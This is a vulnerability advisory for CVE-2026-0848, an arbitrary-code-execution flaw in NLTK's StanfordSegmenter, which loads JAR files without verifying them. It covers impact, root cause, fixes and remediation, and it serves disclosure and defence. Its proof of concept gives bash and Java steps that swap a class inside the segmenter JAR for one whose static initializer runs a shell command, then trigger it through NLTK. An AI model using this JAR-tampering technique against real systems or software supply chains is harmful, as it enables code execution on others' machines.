# CVE-2026-0848 — NLTK StanfordSegmenter: Arbitrary Code Execution via Untrusted JAR Loading

--- ## Overview | Field | Details | |---|---| | **CVE ID** | CVE-2026-0848 | | **Package** | `nltk` (Natural Language Toolkit) | | **Registry** | PyPI | | **Affected Versions** | `<= 3.9.2` | | **Vulnerability Type** | CWE-20: Improper Input Validation | | **CVSS Score** | 10.0 (Critical) | | **Attack Vector** | Network | | **Attack Complexity** | Low | | **Privileges Required** | None | | **User Interaction** | None | | **Scope** | Changed | | **Confidentiality Impact** | High | | **Integrity Impact** | High | | **Availability Impact** | High | | **Reported On** | December 6, 2025 | | **CVE Published** | March 2026 | | **Supported By** | Palo Alto Networks / Prisma AIRS | --- ## Description `nltk.tokenize.StanfordSegmenter` dynamically loads external Java `.jar` files via `subprocess` without performing any integrity verification, signature checking, or sandboxing. The class accepts fully attacker-controlled parameters including `path_to_jar`, `path_to_model`, `path_to_dict`, and `java_class`, and passes them directly to a `java -cp` invocation. If an attacker can supply or replace the JAR file — through a poisoned model download, a man-in-the-middle package swap, dependency poisoning, or a corrupted release mirror — arbitrary Java bytecode executes at class-load time via the JVM's static initializer mechanism. This constitutes a **supply-chain Remote Code Execution** vulnerability and fully escapes the Python runtime. --- ## Affected Components | File | Lines | Description | |---|---|---| | `nltk/tokenize/stanford_segmenter.py` | L53–L118 | Accepts attacker-controlled `path_to_jar`, `path_to_model`, `path_to_dict`, and `java_class` with no validation | | `nltk/internals.py` | L220–L300 | Launches Java execution directly with user-controlled JAR path and classpath, no sandboxing or checksum verification | | `nltk/internals.py` | L109–L152 | `subprocess.Popen()` executes Java with unvalidated classpath input, allowing the JVM to load arbitrary bytecode and run static initializers | --- ## CVSS Vector ``` CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H ``` | Metric | Value | |---|---| | Attack Vector | Network | | Attack Complexity | Low | | Privileges Required | None | | User Interaction | None | | Scope | Changed | | Confidentiality | High | | Integrity | High | | Availability | High | --- ## Impact Successful exploitation grants an attacker **full control over the system** running the NLTK segmentation process: - **Arbitrary Java code execution** — Any bytecode embedded in the malicious JAR runs with the privileges of the Python/Java process - **Python runtime escape** — Execution moves into the JVM, bypassing Python-level sandboxing entirely - **OS-level command execution** — Attackers can invoke `Runtime.getRuntime().exec()` or `ProcessBuilder` to run arbitrary shell commands - **Data theft and modification** — Access to all files, environment variables, API keys, and secrets readable by the process - **Full environment compromise** — In CI/CD, production NLP pipelines, or server environments, a single malicious JAR leads to complete host takeover ### High-Risk Deployment Scenarios | Scenario | Impact | |---|---| | ML researcher loads a pretrained segmenter from the internet | Remote attacker gains code execution | | Organization downloads a corrupted Chinese segmentation model ZIP | Malware executes inside production NLP pipeline | | CI/CD server installs model via `wget`/`unzip` from a non-HTTPS mirror | Full environment compromise | | Dependency takeover or poisoned release mirror | Complete supply-chain RCE | This vulnerability affects any NLP workflow using `StanfordSegmenter`, including chatbots, LLM preprocessing pipelines, dataset segmentation, document classification, and production inference services. --- ## Proof of Concept > **This information is provided for educational and defensive purposes only. Do not test against systems you do not own or have explicit authorization to test.** ### Step 1 — Replace Core Classifier with Malicious Java Class ```bash cd stanford-segmenter-2020-11-17/merged jar xf ../stanford-segmenter-4.2.0.jar rm -rf edu/stanford/nlp/ie/crf/CRFClassifier.class cat << 'EOF' > edu/stanford/nlp/ie/crf/CRFClassifier.java package edu.stanford.nlp.ie.crf; public class CRFClassifier { static { try { System.out.println("\nPayload executed — Code ran on class load!\n"); Runtime.getRuntime().exec("touch /tmp/pwned_hijack"); } catch(Exception e){} } public static void main(String[] args){} } EOF javac edu/stanford/nlp/ie/crf/CRFClassifier.java jar cfm exploit.jar META-INF/MANIFEST.MF * cp exploit.jar ../stanford-segmenter.jar ``` ### Step 2 — Build the Malicious JAR ```bash mkdir merged && cd merged javac Payload.java jar xf ../stanford-segmenter-4.2.0.jar jar xf ../stanford-corenlp-4.2.0/stanford-corenlp-4.2.0.jar jar cfm exploit.jar META-INF/MANIFEST.MF * jar uf exploit.jar Payload.class cp exploit.jar ../stanford-segmenter.jar cd .. ``` ### Step 3 — Trigger via NLTK ```python # test.py from nltk.tokenize.stanford_segmenter import StanfordSegmenter print("[+] Triggering payload via modified Stanford JAR...") seg = StanfordSegmenter( path_to_jar="stanford-segmenter.jar", path_to_sihan_corpora_dict="./data/", path_to_dict="./data/dict-chris6.ser.gz", path_to_model="./data/pku.gz", java_class="edu.stanford.nlp.ie.crf.CRFClassifier", encoding="utf-8" ) print("[+] Running segmentation...") print(seg.segment("我爱自然语言处理")) ``` **Output:** ``` [+] Triggering payload via modified Stanford JAR... Payload executed — Code ran on class load! [+] Running segmentation... 我爱自然语言处理 ``` **Confirm RCE:** ```bash ls /tmp | grep pwned_hijack # pwned_hijack ``` --- ## Root Cause The vulnerability exists across two files: **`stanford_segmenter.py`** — The `StanfordSegmenter` class constructor accepts `path_to_jar`, `path_to_model`, `path_to_dict`, and `java_class` as plain string arguments and forwards them directly to the Java execution layer without performing any of the following: - Path allowlist or trusted-directory enforcement - SHA-256 or cryptographic signature verification of the JAR - Validation of the `java_class` parameter against a known-safe set of class names **`internals.py`** — The `java()` helper constructs and launches a `subprocess.Popen()` call with the user-supplied classpath. The JVM immediately loads all classes in the provided JAR, executing any static initializer blocks before the application logic runs. There is no sandbox, no integrity gate, and no mechanism to prevent execution of injected bytecode. --- ## Fix The vulnerability has been fully resolved in the upstream NLTK repository. | Resource | Link | |---|---| | **Central Security Fix (all CVEs)** | [https://github.com/nltk/nltk/pull/3522](https://github.com/nltk/nltk/pull/3522) | | Researcher's initial fix PR | https://github.com/nltk/nltk/pull/3477 (merged) | Upgrade to a patched version of NLTK as soon as it is available on PyPI. --- ## Remediation | Action | Details | |---|---| | **Upgrade NLTK** | Update to a version greater than 3.9.2 containing the fix from PR #3522 | | **Do Not Use User-Controlled JAR Paths** | Never allow user input to influence `path_to_jar`, `path_to_model`, or `java_class` arguments | | **Verify JAR Integrity** | Always verify SHA-256 checksums of downloaded JAR files against official published hashes before use | | **Use HTTPS Sources Only** | Download model files and JARs exclusively from official HTTPS sources; reject any HTTP or unverified mirror | | **Least Privilege** | Run NLTK-based services under a restricted OS user with minimal filesystem and network permissions | | **Containerization** | Isolate NLP services in Docker containers or similar sandboxes to limit the blast radius of JAR-based exploits | | **Dependency Monitoring** | Use a software composition analysis tool to detect tampered or replaced JAR dependencies in CI/CD pipelines | **Upgrade via pip:** ```bash pip install --upgrade nltk ``` **Verify installed version:** ```bash python -c "import nltk; print(nltk.__version__)" ``` --- ## Timeline | Date | Event | |---|---| | December 6, 2025 | Vulnerability reported to huntr.dev by researcher hyperps1 (Sarvesh Patil) | | December 2025 | NLTK maintainer team notified via huntr.dev | | January 2026 | NLTK maintainer validated the vulnerability; disclosure bounty awarded | | January 2026 | CVE-2026-0848 assigned | | January 2026 | Researcher's fix PR #3477 submitted and merged | | February 2026 | 48-hour pre-publication warning sent to NLTK maintainers | | March 2026 | CVE published on NVD and huntr.dev | | March 2026 | Central security fix for all CVEs merged via PR #3522 | --- ## References | Resource | Link | |---|---| | NVD Entry | https://nvd.nist.gov/vuln/detail/CVE-2026-0848 | | Official CVE Record | https://cve.org/CVERecord?id=CVE-2026-0848 | | huntr.dev Report | https://huntr.dev | | Central Fix PR | https://github.com/nltk/nltk/pull/3522 | | Researcher Fix PR | https://github.com/nltk/nltk/pull/3477 | | NLTK on PyPI | https://pypi.org/project/nltk/ | | Stanford Word Segmenter | https://nlp.stanford.edu/software/segmenter.html | | OWASP — Arbitrary Code Execution | https://owasp.org/www-community/attacks/Code_Injection | | OWASP — Untrusted Search Path | https://owasp.org/www-community/vulnerabilities/Unsafe_use_of_Reflection | | CWE-20: Improper Input Validation | https://cwe.mitre.org/data/definitions/20.html | | CWE-502: Deserialization of Untrusted Data | https://cwe.mitre.org/data/definitions/502.html | --- ## Disclaimer This repository documents CVE-2026-0848 strictly for **educational, research, and defensive security purposes**. The proof-of-concept code and technical details are provided to assist developers, security engineers, and system administrators in understanding, assessing, and remediating this vulnerability. Any use of this information to access or compromise systems without explicit authorization is illegal and unethical. The author assumes no liability for misuse of the information contained herein. Contributors: [ketanHub](https://github.com/ketanHub)